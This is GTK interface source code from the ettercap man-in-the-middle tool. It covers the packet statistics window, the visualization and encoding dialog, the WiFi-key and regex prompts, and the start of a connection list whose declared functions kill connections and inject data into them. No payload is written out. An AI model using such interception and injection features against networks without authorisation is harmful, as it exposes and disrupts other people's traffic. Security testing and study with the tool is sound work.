#include #include #include /* proto */ static void gtkui_set_regex(void); static void gtkui_set_wifikey(void); static void gtkui_stop_stats(void); static void gtkui_stats_detach(GtkWidget *child); static void gtkui_stats_attach(void); static gboolean refresh_stats(gpointer data); /* globals */ #define VLEN 8 static char vmethod[VLEN] = "ascii"; #define RLEN 50 static char vregex[RLEN]; #define WLEN 70 static char wkey[WLEN]; static guint stats_idle; /* for removing the idle call */ /* for stats window */ static GtkWidget *stats_window, *packets_recv, *packets_drop, *packets_forw, *queue_len, *sample_rate, *recv_bottom, *recv_top, *interesting, *rate_bottom, *rate_top, *through_bottom, *through_top; /*******************************************/ /* * If this option is being activated, * it runs through the current hosts list and triggeres * name resolution in the background. * That way subsequent actions benefits from the filled cache */ void toggle_resolve(void) { char name[MAX_HOSTNAME_LEN]; struct hosts_list *hl; /* resolution already set */ if (EC_GBL_OPTIONS->resolve) { EC_GBL_OPTIONS->resolve = 0; resolv_thread_fini(); return; } DEBUG_MSG("toggle_resolve: activate name resolution"); /* set the option and activate resolution threads */ EC_GBL_OPTIONS->resolve = 1; resolv_thread_init(); /* run through the current hosts list and trigger resolution */ LIST_FOREACH(hl, &EC_GBL_HOSTLIST, next) { if (hl->hostname) continue; host_iptoa(&hl->ip, name); } /* actually refresh the host list */ EC_GBL_UI->update(UI_UPDATE_HOSTLIST); } /* * display the statistics windows */ void gtkui_show_stats(void) { GtkWidget *table, *label; DEBUG_MSG("gtkui_show_stats"); /* if the object already exist, set the focus to it */ if (stats_window) { /* show stats window */ if(GTK_IS_WINDOW (stats_window)) gtk_window_present(GTK_WINDOW (stats_window)); else gtkui_page_present(stats_window); return; } stats_window = gtkui_page_new("Statistics", >kui_stop_stats, >kui_stats_detach); /* alright, this is a lot of code but it'll keep everything lined up nicely */ /* if you need to add a row, don't forget to increase the number in gtk_table_new */ table = gtk_table_new(12, 2, FALSE); /* rows, cols, size */ gtk_table_set_col_spacings(GTK_TABLE (table), 10); gtk_container_add(GTK_CONTAINER (stats_window), table); packets_recv = gtk_label_new(" "); gtk_label_set_selectable(GTK_LABEL (packets_recv), TRUE); gtk_misc_set_alignment(GTK_MISC (packets_recv), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), packets_recv, 1, 2, 0, 1); label = gtk_label_new( "Received packets:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 0, 1); packets_drop = gtk_label_new(" "); gtk_label_set_selectable(GTK_LABEL (packets_drop), TRUE); gtk_misc_set_alignment(GTK_MISC (packets_drop), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), packets_drop, 1, 2, 1, 2); label = gtk_label_new("Dropped packets:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 1, 2); packets_forw = gtk_label_new(" 0 bytes: 0 "); gtk_label_set_selectable(GTK_LABEL (packets_forw), TRUE); gtk_misc_set_alignment(GTK_MISC (packets_forw), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), packets_forw, 1, 2, 2, 3); label = gtk_label_new("Forwarded packets:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 2, 3); queue_len = gtk_label_new("0/0 "); gtk_label_set_selectable(GTK_LABEL (queue_len), TRUE); gtk_misc_set_alignment(GTK_MISC (queue_len), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), queue_len, 1, 2, 3, 4); label = gtk_label_new("Current queue length:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 3, 4); sample_rate = gtk_label_new("0 "); gtk_label_set_selectable(GTK_LABEL (sample_rate), TRUE); gtk_misc_set_alignment(GTK_MISC (sample_rate), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), sample_rate, 1, 2, 4, 5); label = gtk_label_new("Sampling rate:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 4, 5); recv_bottom = gtk_label_new("pck: 0 bytes: 0"); gtk_label_set_selectable(GTK_LABEL (recv_bottom), TRUE); gtk_misc_set_alignment(GTK_MISC (recv_bottom), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), recv_bottom, 1, 2, 5, 6); label = gtk_label_new("Bottom Half received packet:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 5, 6); recv_top = gtk_label_new("pck: 0 bytes: 0"); gtk_label_set_selectable(GTK_LABEL (recv_top), TRUE); gtk_misc_set_alignment(GTK_MISC (recv_top), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), recv_top, 1, 2, 6, 7); label = gtk_label_new("Top Half received packet:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 6, 7); interesting = gtk_label_new("0.00 %"); gtk_label_set_selectable(GTK_LABEL (interesting), TRUE); gtk_misc_set_alignment(GTK_MISC (interesting), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), interesting, 1, 2, 7, 8); label = gtk_label_new("Interesting packets:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 7, 8); rate_bottom = gtk_label_new("worst: 0 adv: 0 b/s"); gtk_label_set_selectable(GTK_LABEL (rate_bottom), TRUE); gtk_misc_set_alignment(GTK_MISC (rate_bottom), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), rate_bottom, 1, 2, 8, 9); label = gtk_label_new("Bottom Half packet rate:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 8, 9); rate_top = gtk_label_new("worst: 0 adv: 0 b/s"); gtk_label_set_selectable(GTK_LABEL (rate_top), TRUE); gtk_misc_set_alignment(GTK_MISC (rate_top), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), rate_top, 1, 2, 9, 10); label = gtk_label_new("Top Half packet rate:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 9, 10); through_bottom = gtk_label_new("worst: 0 adv: 0 b/s"); gtk_label_set_selectable(GTK_LABEL (through_bottom), TRUE); gtk_misc_set_alignment(GTK_MISC (through_bottom), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), through_bottom, 1, 2, 10, 11); label = gtk_label_new("Bottom Half throughput:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 10, 11); through_top = gtk_label_new("worst: 0 adv: 0 b/s"); gtk_label_set_selectable(GTK_LABEL (through_top), TRUE); gtk_misc_set_alignment(GTK_MISC (through_top), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), through_top, 1, 2, 11, 12); label = gtk_label_new("Top Half throughput:"); gtk_label_set_selectable(GTK_LABEL (label), TRUE); gtk_misc_set_alignment(GTK_MISC (label), 0, 0.5); gtk_table_attach_defaults(GTK_TABLE(table), label, 0, 1, 11, 12); gtk_widget_show_all(table); gtk_widget_show(stats_window); /* display the stats */ refresh_stats(NULL); /* refresh the stats window every 200 ms */ /* GTK has a gtk_idle_add also but it calls too much and uses 100% cpu */ stats_idle = g_timeout_add(200, refresh_stats, NULL); } static void gtkui_stats_detach(GtkWidget *child) { stats_window = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_title(GTK_WINDOW (stats_window), "Statistics"); gtk_container_set_border_width(GTK_CONTAINER (stats_window), 10); g_signal_connect (G_OBJECT (stats_window), "delete_event", G_CALLBACK (gtkui_stop_stats), NULL); /* make d shortcut turn the window back into a tab */ gtkui_page_attach_shortcut(stats_window, gtkui_stats_attach); gtk_container_add(GTK_CONTAINER (stats_window), child); gtk_window_present(GTK_WINDOW (stats_window)); } static void gtkui_stats_attach(void) { gtkui_stop_stats(); gtkui_show_stats(); } static void gtkui_stop_stats(void) { DEBUG_MSG("gtk_stop_stats"); g_source_remove(stats_idle); gtk_widget_destroy(stats_window); stats_window = NULL; } static gboolean refresh_stats(gpointer data) { char line[50]; /* variable not used */ (void) data; /* if not focused don't refresh it */ /* this also removes the idle call, but should only occur if the window isn't visible */ if (!gtk_widget_get_visible(stats_window)) return FALSE; snprintf(line, 50, "%8"PRIu64, EC_GBL_STATS->ps_recv); gtk_label_set_text(GTK_LABEL (packets_recv), line); snprintf(line, 50, "%8"PRIu64" %.2f %%", EC_GBL_STATS->ps_drop, (EC_GBL_STATS->ps_recv) ? (float)EC_GBL_STATS->ps_drop * 100 / EC_GBL_STATS->ps_recv : 0 ); gtk_label_set_text(GTK_LABEL (packets_drop), line); snprintf(line, 50, "%8"PRIu64" bytes: %8"PRIu64" ", EC_GBL_STATS->ps_sent, EC_GBL_STATS->bs_sent); gtk_label_set_text(GTK_LABEL (packets_forw), line); snprintf(line, 50, "%lu/%lu ", EC_GBL_STATS->queue_curr, EC_GBL_STATS->queue_max); gtk_label_set_text(GTK_LABEL (queue_len), line); snprintf(line, 50, "%d ", EC_GBL_CONF->sampling_rate); gtk_label_set_text(GTK_LABEL (sample_rate), line); snprintf(line, 50, "pck: %8"PRIu64" bytes: %8"PRIu64, EC_GBL_STATS->bh.pck_recv, EC_GBL_STATS->bh.pck_size); gtk_label_set_text(GTK_LABEL (recv_bottom), line); snprintf(line, 50, "pck: %8"PRIu64" bytes: %8"PRIu64, EC_GBL_STATS->th.pck_recv, EC_GBL_STATS->th.pck_size); gtk_label_set_text(GTK_LABEL (recv_top), line); snprintf(line, 50, "%.2f %%", (EC_GBL_STATS->bh.pck_recv) ? (float)EC_GBL_STATS->th.pck_recv * 100 / EC_GBL_STATS->bh.pck_recv : 0 ); gtk_label_set_text(GTK_LABEL (interesting), line); snprintf(line, 50, "worst: %8lu adv: %8lu p/s", EC_GBL_STATS->bh.rate_worst, EC_GBL_STATS->bh.rate_adv); gtk_label_set_text(GTK_LABEL (rate_bottom), line); snprintf(line, 50, "worst: %8lu adv: %8lu p/s", EC_GBL_STATS->th.rate_worst, EC_GBL_STATS->th.rate_adv); gtk_label_set_text(GTK_LABEL (rate_top), line); snprintf(line, 50, "worst: %8lu adv: %8lu b/s", EC_GBL_STATS->bh.thru_worst, EC_GBL_STATS->bh.thru_adv); gtk_label_set_text(GTK_LABEL (through_bottom), line); snprintf(line, 50, "worst: %8lu adv: %8lu b/s", EC_GBL_STATS->th.thru_worst, EC_GBL_STATS->th.thru_adv); gtk_label_set_text(GTK_LABEL (through_top), line); return(TRUE); } /* * change the visualization method */ void gtkui_vis_method(void) { GtkWidget *dialog, *button, *prev, *vbox, *content_area; GSList *curr = NULL; gint active = 0, response = 0; GtkTreeModel *model; GtkTreeIter iter; GtkListStore *lang_list = NULL; GtkCellRenderer *cell = NULL; GtkWidget *hbox, *lang_combo, *label; char encoding[50], def_lang[75]; const char *local_lang, *selected_lang; DEBUG_MSG("gtk_vis_method"); dialog = gtk_dialog_new_with_buttons("Visualization method...", GTK_WINDOW (window), GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT, GTK_STOCK_CANCEL, GTK_RESPONSE_CANCEL, GTK_STOCK_OK, GTK_RESPONSE_OK, NULL); gtk_container_set_border_width(GTK_CONTAINER(dialog), 10); content_area = gtk_dialog_get_content_area(GTK_DIALOG(dialog)); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_container_add(GTK_CONTAINER(content_area), vbox); button = gtk_radio_button_new_with_label(NULL, "Print the packets in hex format."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "hex") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Print only \"printable\" characters, the others are displayed as dots '.'"); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "ascii") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Print only the \"printable\" characters and skip the others."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "text") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Convert an EBCDIC text to ASCII."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "ebcdic") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Strip all the html tags from the text. A tag is every string between < and >."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "html") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; /* start UTF8 */ button = gtk_radio_button_new_with_label_from_widget(GTK_RADIO_BUTTON (prev), "Convert the data from the encoding specified below to UTF8 before displaying it."); gtk_box_pack_start(GTK_BOX(vbox), button, FALSE, FALSE, 0); if(strcmp(vmethod, "utf8") == 0) gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON (button), TRUE); prev = button; hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 6, FALSE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); label = gtk_label_new ("Character encoding : "); gtk_box_pack_start (GTK_BOX (hbox), label, FALSE, FALSE, 0); /* Fill a list of available encodings */ lang_list = gtk_list_store_new(1, G_TYPE_STRING); /* get the system's default encoding, and if it's not UTF8, add it to the list */ if(!g_get_charset(&local_lang)) { snprintf(def_lang, 75, "%s (System Default)", local_lang); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, def_lang, -1); } /* some other common encodings */ gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "UTF-8", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "EBCDIC-US (IBM)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-15 (Western Europe)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-2 (Central Europe)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-7 (Greek)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-8 (Hebrew)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-8859-9 (Turkish)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "ISO-2022-JP (Japanese)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "SJIS (Japanese)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "CP949 (Korean)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "CP1251 (Cyrillic)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "CP1256 (Arabic)", -1); gtk_list_store_append(lang_list, &iter); gtk_list_store_set(lang_list, &iter, 0, "GB18030 (Chinese)", -1); /* make a drop down box and assign the list to it */ lang_combo = gtk_combo_box_new(); gtk_combo_box_set_model(GTK_COMBO_BOX(lang_combo), GTK_TREE_MODEL(lang_list)); /* list is stored in the widget, can safely free this copy */ g_object_unref(lang_list); /* end UTF8 */ cell = gtk_cell_renderer_text_new(); gtk_cell_layout_pack_start(GTK_CELL_LAYOUT(lang_combo), cell, TRUE); gtk_cell_layout_set_attributes(GTK_CELL_LAYOUT(lang_combo), cell, "text", 0, NULL); gtk_combo_box_set_active(GTK_COMBO_BOX(lang_combo), 0); gtk_box_pack_start (GTK_BOX(hbox), lang_combo, TRUE, TRUE, 0); gtk_widget_show_all(vbox); response = gtk_dialog_run(GTK_DIALOG (dialog)); if(response == GTK_RESPONSE_OK) { gtk_widget_hide(dialog); /* see which button was clicked */ active = 0; for(curr = gtk_radio_button_get_group(GTK_RADIO_BUTTON (button)); curr; curr = curr->next) { active++; if(gtk_toggle_button_get_active(GTK_TOGGLE_BUTTON (curr->data))) break; } /* set vmethod string */ int i=0; memset(vmethod, 0, VLEN); switch(active) { case 6: strncpy(vmethod, "hex", 4); break; case 5: strncpy(vmethod, "ascii", 6); break; case 4: strncpy(vmethod, "text", 5); break; case 3: strncpy(vmethod, "ebcdic", 7); break; case 2: strncpy(vmethod, "html", 5); break; case 1: /* utf8 */ /* copy first word from encoding choice */ gtk_combo_box_get_active_iter(GTK_COMBO_BOX(lang_combo), &iter); model = gtk_combo_box_get_model(GTK_COMBO_BOX(lang_combo)); gtk_tree_model_get(model, &iter, 0, &selected_lang, -1); i=sscanf(selected_lang, "%[^ ]", encoding); BUG_IF(i!=1); if(strlen(encoding) > 0) { strncpy(vmethod, "utf8", 4); set_utf8_encoding(encoding); break; } default: strncpy(vmethod, "ascii", 5); } set_format(vmethod); } gtk_widget_destroy(dialog); } /* * set the visualization regex */ void gtkui_vis_regex(void) { DEBUG_MSG("gtk_vis_regex"); gtkui_input("Visualization regex :", vregex, RLEN, gtkui_set_regex); } static void gtkui_set_regex(void) { set_regex(vregex); } /* * set the Wifi key */ void gtkui_wifi_key(void) { DEBUG_MSG("gtk_wifi_key"); gtkui_input("WiFi key :", wkey, WLEN, gtkui_set_wifikey); } static void gtkui_set_wifikey(void) { wifi_key_prepare(wkey); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk_view_connections.c000664 000000 000000 00000200367 13711276346 024225 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include #include #include /* double-linked list for fast updates to connection list */ struct row_pairs { void *conn; GtkTreeIter iter; struct row_pairs *next; struct row_pairs *prev; }; /* filter objects */ struct conn_filter { /* model handle for filtered tree */ GtkTreeModel *model; /* Host filter */ const gchar *host; /* Protocol filter */ gboolean tcp; gboolean udp; gboolean other; /* Connection state filter */ gboolean active; gboolean idle; gboolean closing; gboolean closed; gboolean killed; }; /* proto */ static void gtkui_connections_detach(GtkWidget *child); static void gtkui_connections_attach(void); static void gtkui_kill_connections(void); static gboolean refresh_connections(gpointer data); static struct row_pairs *gtkui_connections_add(struct conn_object *co, void *conn, struct row_pairs **list); static void gtkui_connection_list_row(int top, struct row_pairs *pair); static void gtkui_connection_detail(void); static void gtkui_connection_detail_destroy(GtkWidget *widget, gpointer *data); static void gtkui_connection_data(void); static void gtkui_connection_data_split(void); static void gtkui_connection_data_join(void); static void gtkui_connection_data_detach(GtkWidget *child); static void gtkui_connection_data_attach(void); static void gtkui_destroy_conndata(void); static gboolean gtkui_connections_scroll(gpointer data); static void gtkui_data_print(int buffer, char *data, int color); static void split_print(u_char *text, size_t len, struct ip_addr *L3_src); static void split_print_po(struct packet_object *po); static void join_print(u_char *text, size_t len, struct ip_addr *L3_src); static void join_print_po(struct packet_object *po); static void gtkui_connection_purge(void *conn); static void gtkui_connection_kill(void *conn); static void gtkui_connection_kill_curr_conn(void); static void gtkui_connection_inject(void); static void gtkui_inject_user(int side); static void gtkui_connection_inject_file(void); static void gtkui_inject_file(const char *filename, int side); static void set_connfilter(GtkWidget *widget, gpointer *data); static void set_connfilter_host(GtkWidget *widget, gpointer *data); static gboolean connfilter(GtkTreeModel *model, GtkTreeIter *iter, gpointer *data); extern void conntrack_lock(void); extern void conntrack_unlock(void); /*** globals ***/ /* connection list */ static struct row_pairs *connections = NULL; static GtkWidget *conns_window = NULL; static GtkWidget *treeview = NULL; /* the visible part of the GTK list */ static GtkListStore *ls_conns = NULL; /* the data part */ static GtkTreeSelection *selection = NULL; static struct conn_object *curr_conn = NULL; static struct conn_filter filter; static guint connections_idle = 0; /* connection detail window */ static guint detail_timer1 = 0; static guint detail_timer2 = 0; /* split and joined data views */ static GtkWidget *data_window = NULL; static GtkWidget *textview1 = NULL; /* visible part of data output */ static GtkWidget *textview2 = NULL; static GtkWidget *textview3 = NULL; static GtkTextBuffer *splitbuf1 = NULL; /* where data is stored */ static GtkTextBuffer *splitbuf2 = NULL; static GtkTextBuffer *joinedbuf = NULL; static GtkTextMark *endmark1 = NULL; /* marks for auto-scrolling */ static GtkTextMark *endmark2 = NULL; static GtkTextMark *endmark3 = NULL; /* keep it global, so the memory region is always the same (reallocing it) */ static u_char *dispbuf; static u_char *injectbuf; /*******************************************/ /* * the auto-refreshing list of connections */ void gtkui_show_connections(void) { GtkWidget *scrolled, *vbox, *items, *hbox, *button, *tbox; GtkWidget *context_menu, *frame, *entry, *chkb_tcp, *chkb_udp, *chkb_other; GtkWidget *chkb_active, *chkb_idle, *chkb_closing, *chkb_closed, *chkb_killed; GtkTreeModel *model; GtkToolItem *toolbutton; GtkCellRenderer *renderer; GtkTreeViewColumn *column; DEBUG_MSG("gtk_show_connections"); /* if the object already exist, set the focus to it */ if (conns_window) { if(GTK_IS_WINDOW (conns_window)) gtk_window_present(GTK_WINDOW (conns_window)); else gtkui_page_present(conns_window); return; } conns_window = gtkui_page_new("Connections", >kui_kill_connections, >kui_connections_detach); vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 0, FALSE); gtk_container_add(GTK_CONTAINER (conns_window), vbox); gtk_widget_show(vbox); /* filter bar */ hbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 10, FALSE); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); frame = gtk_frame_new("Host filter"); tbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 0, FALSE); gtk_container_add(GTK_CONTAINER(frame), tbox); entry = gtk_entry_new(); g_signal_connect(G_OBJECT(entry), "activate", G_CALLBACK(set_connfilter_host), NULL); gtk_box_pack_start(GTK_BOX(tbox), entry, FALSE, FALSE, 5); toolbutton = gtk_tool_button_new_from_stock(GTK_STOCK_APPLY); g_signal_connect_swapped(G_OBJECT(toolbutton), "clicked", G_CALLBACK(set_connfilter_host), entry); gtk_box_pack_start(GTK_BOX(tbox), GTK_WIDGET(toolbutton), FALSE, FALSE, 5); filter.host = NULL; gtk_box_pack_start(GTK_BOX(hbox), frame, FALSE, FALSE, 0); frame = gtk_frame_new("Protocol filter"); tbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 0, FALSE); gtk_container_add(GTK_CONTAINER(frame), tbox); chkb_tcp = gtk_check_button_new_with_label("TCP"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_tcp), TRUE); filter.tcp = TRUE; g_signal_connect(G_OBJECT(chkb_tcp), "toggled", G_CALLBACK(set_connfilter), &filter.tcp); gtk_box_pack_start(GTK_BOX(tbox), chkb_tcp, FALSE, FALSE, 5); chkb_udp = gtk_check_button_new_with_label("UDP"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_udp), TRUE); filter.udp = TRUE; g_signal_connect(G_OBJECT(chkb_udp), "toggled", G_CALLBACK(set_connfilter), &filter.udp); gtk_box_pack_start(GTK_BOX(tbox), chkb_udp, FALSE, FALSE, 5); chkb_other = gtk_check_button_new_with_label("Other"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_other), TRUE); filter.other = TRUE; g_signal_connect(G_OBJECT(chkb_other), "toggled", G_CALLBACK(set_connfilter), &filter.other); gtk_box_pack_start(GTK_BOX(tbox), chkb_other, FALSE, FALSE, 5); gtk_box_pack_start(GTK_BOX(hbox), frame, FALSE, FALSE, 0); frame = gtk_frame_new("Connection state filter"); tbox = gtkui_box_new(GTK_ORIENTATION_HORIZONTAL, 0, FALSE); gtk_container_add(GTK_CONTAINER(frame), tbox); chkb_active = gtk_check_button_new_with_label("Active"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_active), TRUE); filter.active = TRUE; g_signal_connect(G_OBJECT(chkb_active), "toggled", G_CALLBACK(set_connfilter), &filter.active); gtk_box_pack_start(GTK_BOX(tbox), chkb_active, FALSE, FALSE, 5); chkb_idle = gtk_check_button_new_with_label("Idle"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_idle), TRUE); filter.idle = TRUE; g_signal_connect(G_OBJECT(chkb_idle), "toggled", G_CALLBACK(set_connfilter), &filter.idle); gtk_box_pack_start(GTK_BOX(tbox), chkb_idle, FALSE, FALSE, 5); chkb_closing = gtk_check_button_new_with_label("Closing"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_closing), TRUE); filter.closing = TRUE; g_signal_connect(G_OBJECT(chkb_closing), "toggled", G_CALLBACK(set_connfilter), &filter.closing); gtk_box_pack_start(GTK_BOX(tbox), chkb_closing, FALSE, FALSE, 5); chkb_closed = gtk_check_button_new_with_label("Closed"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_closed), TRUE); filter.closed = TRUE; g_signal_connect(G_OBJECT(chkb_closed), "toggled", G_CALLBACK(set_connfilter), &filter.closed); gtk_box_pack_start(GTK_BOX(tbox), chkb_closed, FALSE, FALSE, 5); chkb_killed = gtk_check_button_new_with_label("Killed"); gtk_toggle_button_set_active(GTK_TOGGLE_BUTTON(chkb_killed), TRUE); filter.killed = TRUE; g_signal_connect(G_OBJECT(chkb_killed), "toggled", G_CALLBACK(set_connfilter), &filter.killed); gtk_box_pack_start(GTK_BOX(tbox), chkb_killed, FALSE, FALSE, 5); gtk_box_pack_start(GTK_BOX(hbox), frame, FALSE, FALSE, 0); gtk_widget_show_all(hbox); /* list */ scrolled = gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scrolled), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scrolled), GTK_SHADOW_IN); gtk_box_pack_start(GTK_BOX(vbox), scrolled, TRUE, TRUE, 0); gtk_widget_show(scrolled); treeview = gtk_tree_view_new(); gtk_container_add(GTK_CONTAINER (scrolled), treeview); gtk_widget_show(treeview); selection = gtk_tree_view_get_selection (GTK_TREE_VIEW (treeview)); gtk_tree_selection_set_mode (selection, GTK_SELECTION_SINGLE); g_signal_connect (G_OBJECT (treeview), "row_activated", G_CALLBACK (gtkui_connection_data), NULL); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes (" ", renderer, "text", 0, NULL); gtk_tree_view_column_set_sort_column_id (column, 0); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Host ", renderer, "text", 1, NULL); gtk_tree_view_column_set_sort_column_id (column, 1); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Port", renderer, "text", 2, NULL); gtk_tree_view_column_set_sort_column_id (column, 2); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("-", renderer, "text", 3, NULL); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Host ", renderer, "text", 4, NULL); gtk_tree_view_column_set_sort_column_id (column, 4); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Port", renderer, "text", 5, NULL); gtk_tree_view_column_set_sort_column_id (column, 5); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("Proto", renderer, "text", 6, NULL); gtk_tree_view_column_set_sort_column_id (column, 6); gtk_tree_view_append_column (GTK_TREE_VIEW(treeview), column); renderer = gtk_cell_renderer_text_new (); column = gtk_tree_view_column_new_with_attributes ("State", renderer, "text", 7, NULL); gtk_tree_view_column_set_sort_column_id (column, 7); gtk_tree_view_append_column 